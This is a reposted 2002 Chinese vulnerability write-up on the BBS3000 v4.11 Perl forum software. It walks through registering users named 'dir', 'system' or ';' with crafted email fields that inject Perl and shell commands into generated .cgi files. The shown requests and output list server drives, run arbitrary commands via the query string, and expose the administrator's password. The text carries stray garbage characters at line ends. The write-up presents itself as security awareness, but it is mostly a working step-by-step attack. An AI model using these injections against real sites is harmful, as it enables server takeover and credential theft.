窥探YUZI的BBS3000社区安全性--1
" C. M+ i3 }" e# H/ |& K! `文章类型:漏洞分析 文章加入时间:2002年1月24日22:24
' [/ j+ X; {- y- F' q% u) o--------------------------------------------------------------------------------. O. Z, n) W4 P3 m
7 {" p$ r" e* I: S! t7 E
窥探YUZI的BBS3000社区安全性
; h5 t6 _* M( d- @0 P9 K—————————————————————————————————) S+ T3 n c& _) x* o7 H, Z& h
badboy-club@21cn.com
/ g9 S8 \4 Y) e; N4 q- F* o部分漏洞提供者:/ `# c# ?; y! X Q
adver
2 P& I: v7 u# o! M' m+ L/ z/ ox.z6 n8 g; O7 n) l% X3 T3 `: H
这并不是什么权威教材,只适合菜鸟了解某些免费提供的论坛程序存在的不: {- j* s6 W5 h' X( `/ t
安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一
. p% `0 {* w5 q, j4 k/ D) g+ _7 G切法律后果由你自己负责。
. t2 h9 \+ y% x# l h本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
}) A- \: i( Z2 q H的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人- S& [1 `6 ?% F% z, k
将保留侵权控告的权利。
: P, _# J! I' t/ |5 l/ z- g—————————————————————————————————1 F% K" m# t( ^2 M
第一篇
7 _* [: N4 O& ]$ z****基本漏洞测试****** O4 h8 L; J5 V2 k
YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛,
. D7 |/ S# y! m/ ]9 ~! I( X但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上
. S D1 ]% x2 v7 @& b) h这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭
5 P& F% N/ h7 }% C2 o8 n% q1 m示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐
4 j' P8 b* I$ ^2 T/ N- _3 i蔽和服务器的安全。2 I% k! j% Y- [' A9 ]4 o$ Y
测试版本:bbs3000 v4.11
7 a+ `3 y5 g7 k) }5 g P系统平台:win2k adv server=sp3 + iis 5.0 +ActivePerl 5.6.1.626
/ y8 F) N5 w& p6 C4 n( @! u( w应用程序映射:perl.exe %s %s 动作:GET,HEAD,POST
' C+ U* z! Q* d( F0 p2 h3 Z 或者:perlIS.dll 动作:GET,HEAD,POST
: H" g0 M2 [6 T6 r h- M( ]测试情况:
3 ` j* K4 @0 T' \$ v; g w% w+ ?# H一、用户名为dir的漏洞
3 D5 z0 `0 A; ]9 }' P1、采用应用程序映射:perl.exe %s %s应用程序映射
9 R( j& T. {+ X j, [% t# u/ v7 o在站点建立一目录(或者虚拟目录)bbs3000,按论坛作者提供的说明书,默认安
* Z1 s# ~/ [" j; s: c" |. S装BBS3000 v4.11版本,我们注册一用户名为dir,密码为system,信箱为
3 q( V* K; U) H#badboy@badclub.org(#任意信箱都可以),然后我们在IE地址栏处输入:7 t. ]% `+ o! O- {( w
http://192.168.0.1/bbs3000/yhzl/dir.cgi& `7 n- _0 w. Z% ]6 S* C
F:\new\bbs3000\bbs3000 的目录( w! K$ E* s6 `% Y9 P0 N
2002-01-16 19:26 <DIR> .
' [2 O3 K9 b1 f! |2002-01-16 19:26 <DIR> ..9 c. Y9 O( c w. v: m
2002-01-16 22:42 43,247 bbs.cgi( `; s- a5 `* P2 h0 ~
2002-01-16 22:47 50,934 cjyh.cgi
3 f4 I/ E5 ?/ p9 a2 z2002-01-16 22:43 38,551 bbs1.cgi
' N( B& c/ O& m. y' |- f$ S" W2002-01-16 22:48 6,401 cookie.cgi }% {1 C) f* W' O1 D. h9 M1 k
2002-01-16 22:42 2,138 affiche.cgi9 m9 ?3 C( j( U( A
2002-01-16 22:43 22,434 bbs2.cgi
4 k4 e3 ?8 h j$ B(以下略)0 B; b' W8 N7 J; \
34 个文件 417,611 字节
1 l3 c7 u7 y$ Q. s$ P7 z3 g7 s 15 个目录 1,830,944,768 可用字节
8 g+ o8 O" n+ h
" `3 G$ K0 J* V8 X: O0 _9 E" @9 r/ @/ |( b2、采用应用程序映射:perlIS.dll应用程序映射" ^' a6 p* k: Q, s
得到的显示页面为:. D( S. B$ ]3 p8 u- b0 u* J, i
'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
& V6 \$ ]0 t4 }0 [) H测试解释:在应用程序映射中,一个扩展名只能由一个程序去映射,在采用# A" B+ a- W. l0 y% t# @' O
perl.exe时,BBS3000存在查看网站目录和文件的漏洞,在采用perlIS.dll时,
# s# M. n# {$ t! q7 D则有暴露网站在服务器上的绝对地址的漏洞。
7 \3 N# p6 W2 ~/ Y r$ ]3 Z: o二、用户名为system的漏洞
1 L9 d6 t/ E% B. T- `" F1 p5 u1、采用应用程序映射:perl.exe %s %s应用程序映射
( E! Q) O) R) Q7 }4 M! w注册一用户名为system,密码为空格键(或者密码为system),信箱为% H I3 L) Q$ A. K
'dir c:'#@badclub.org,然后我们在IE地址栏内输入:
, F3 Q9 }0 e7 q5 V1 F5 q, Zhttp://192.168.0.1/bbs3000/yhzl/system.cgi" U Y, ?- ?" E% \0 y* Q/ V
返回的页面显示为:
0 z6 D/ r( i: t) B- wC:\ 的目录
4 k/ U0 b% u- ]2001-11-27 20:56 1,002 FRUNLOG.TXT
/ J, d1 [) K5 [2001-11-27 20:49 <DIR> WINNT' a1 d5 K7 J9 I6 u- ]: R, P+ t+ V
(以下略)- k; S/ j1 w) k# V! B
10 个文件 29,583 字节
3 M* O. h7 z' f" t! r! z7 d 9 个目录 946,327,552 可用字节
1 B T, x! n" Q当密码为其他时,则显示:
9 u* f- R; @" L% R. ~CGI Error
% e3 }! ~$ \' E6 f, TThe specified CGI application misbehaved by not returning a complete
& M# K K% t+ z7 P# s$ W0 W5 R set of HTTP headers. The headers it did return are:
$ O2 M. i2 V& Q6 asyntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near2 w, R- Q5 U8 s8 u M# ^) X9 ]$ {
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
/ V8 h$ g/ F# K/ E' C% K. L8 }& z2 paborted due to compilation errors.
; C. ~8 Y( {3 j! x我们还可以这样测试用户名为system的情况,密码仍然为空格键
; P3 C# f6 _3 f(或者密码为system)但把信箱修改为@ARGV##badboy@badclub.org,然后我' m5 Y w! t3 x* ~5 ~
们在IE地址栏内输入:
C( @* h% K% m& Thttp://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
2 Z' M' j- M5 I; S返回的页面显示: K6 W/ F) u Q, n
D:\ 的目录1 O( n1 U6 ]( n& p: A4 `
2001-01-18 23:23 <DIR> tools
1 q* w! E9 [. v# O, W2001-11-27 21:18 <DIR> 98tools
7 S: \8 v4 @: d% F1 M2001-04-08 13:08 <DIR> W2Kreskit
5 [- _' ^5 t3 m9 }$ [8 @) h* D! K2001-11-06 19:52 <DIR> NOCDKEY-PROT
9 X N" v# p# E3 |. q' c2001-12-01 21:32 <DIR> WINNT0 [0 w6 t4 z O5 Y* H \
2001-12-01 21:39 <DIR> Documents and Settings C/ S: Z/ W) m
2001-12-01 21:41 <DIR> Program Files. s! a7 {" P; l0 ~0 c4 |
2001-12-01 21:53 <DIR> Inetpub
& w, p, u, R* x2 F0 ]8 D9 x2002-01-16 19:17 <DIR> pl
0 X* q- ]/ A8 a5 A0 O8 [(以下省略部分内容)
. A6 p. }; ]3 \ 12 个文件 15,068,818 字节
* l- r' T4 X+ S3 c( ^4 p: C* d4 h 15 个目录 2,371,317,760 可用字节. D6 i; b3 c$ h2 p, \4 X: c* x
'0' 不是内部或外部命令,也不是可运行的程序; ]4 V9 ~# W4 H
或批处理文件。
2 u, G; N# W5 D; _' ^5 E$ a; Z. T2、采用应用程序映射:perlIS.dll应用程序映射5 u- ]" q I* s4 d0 y2 W: {
用户名为system,密码为空格键(或者密码为system),信箱为'dir c:'#@badclub.org,
) ~# x+ |/ g7 y- `" o# g( E. r然后我们在IE地址栏内输入:
. n! e! E- u! [4 l6 V8 hhttp://192.168.0.1/bbs3000/yhzl/system.cgi5 g' c' V0 }6 v* v- \ j' {8 D
返回的页面显示为:
5 q8 u- P; K: C0 T. U'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output 0 g b1 M8 j) N1 K( p/ c8 T
把信箱修改为@ARGV##badboy@badclub.org,然后我们在IE地址栏内输入:
+ a+ i- Y7 `, I" s9 Ohttp://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:. q) z: _! N2 T( M$ [7 E
返回的页面显示" Y5 g" g4 W9 J7 u3 U4 X, K
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output' Q) B4 M, W, {" M& P
三、用户名为;字符的情况) L& i9 r2 U! z, z
1、采用应用程序映射:perlIS.dll应用程序映射' q e1 @$ W7 Y
注册一用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ,6 e0 q# N k$ i/ @
(这里假设badboy为该论坛的社区区长,也就是该论坛最大权限的用户),然后我们7 [# D c( j8 u1 d' s
在IE地址栏内输入:
- v. k" p( D: a( M' ehttp://192.168.0.1/bbs3000/yhzl/;.cgi
( p# v4 K" C$ z0 o& i返回的页面显示
! H) I% d- u k: `% I' ^! r! U'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
0 v4 h# r9 ^$ @1 O嗯,怎么还是和上面的perl.dll例子一样啊??后面的就是关键了,你再输入这样
# X. \& F+ z2 m( H3 V8 P7 P, X的看看
: D' [& J/ y$ \7 X d q1 ihttp://192.168.0.1/bbs3000/yhzl/badboy.txt
- ^9 p, [* k6 |. r2 v返回的页面显示为
& M% K b- F$ }; _' Kbadpass badboy http://192.168.0.1 2002-01-166 J1 x/ a7 n0 D4 f. u+ h, G
显示的内容前面就是密码、用户
8 n+ ?6 R* f. B7 n# x, Q& T7 X天啊,事情怎么那么容易呀!!~_*
" b: S% T5 b( r1 v: M经测试,用户名为system密码为一个空格键(或者为system),信箱为4 t5 G) j# E+ \) w ]
rename "badboy.cgi","badboy.txt";#@badclub.org 的时候,步骤和上面一样,同样7 R, [/ I( ?9 @; S, i8 u' N
可以获得相同的结果。 E! V; P) u% j1 v, g! J
2、采用应用程序映射:perl.exe %s %s应用程序映射" n, V4 A5 B1 V" ]( r0 d8 y
用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org # J5 g" q4 u1 r( a2 X S4 N! {
在IE地址栏内输入:3 P7 _( _9 ?( H+ I
http://192.168.0.1/bbs3000/yhzl/;.cgi# k6 |) S( K3 ` }9 b4 m2 ^0 V
返回的页面显示+ W* @4 Z' x t, w0 n, O
CGI Error" i; @: d0 X, l. g! m/ X' b
The specified CGI application misbehaved by not returning a complete set of HTTP
; M8 j+ h, ~& l% e$ [. Jheaders. The headers it did return are: % M- _; w7 L! L, T @8 b& S
|
/1 
44152102000001
发表于 2002-2-4 09:43:11
